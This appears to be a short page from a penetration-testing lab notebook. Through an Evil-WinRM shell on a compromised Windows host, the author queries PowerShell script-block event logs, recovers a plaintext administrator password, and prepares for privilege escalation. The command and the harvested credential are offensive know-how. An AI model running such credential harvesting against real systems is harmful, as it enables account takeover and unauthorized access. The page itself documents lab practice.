InfoSec LAB

Event Log

It has been identified that the current user is part of the Event Log Reader group on the compromised host. Additionally, PEAS was able to read some of the sensitive event logs.

*Evil-WinRM* PS C:\Users\scripting\Documents> Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational';ID=4104} | Select-Object TimeCreated,Id,@{n='Script';e={$_.Properties[2].Value}} | Format-Table -Wrap -AutoSize | findstr "adminpass"
                           $adminpass = 'TheShellIsMightierThanTheSword!'
                           net user administrator $adminpass /Y
                           [System.String]$Content = $adminpass

The password of the administrator account identified; TheShellIsMightierThanTheSword! Moving on to the Privilege Escalation phase.

InfoSec LAB

Explorer

Compromised_Event_Log

Event Log

Interactive Graph View

Backlinks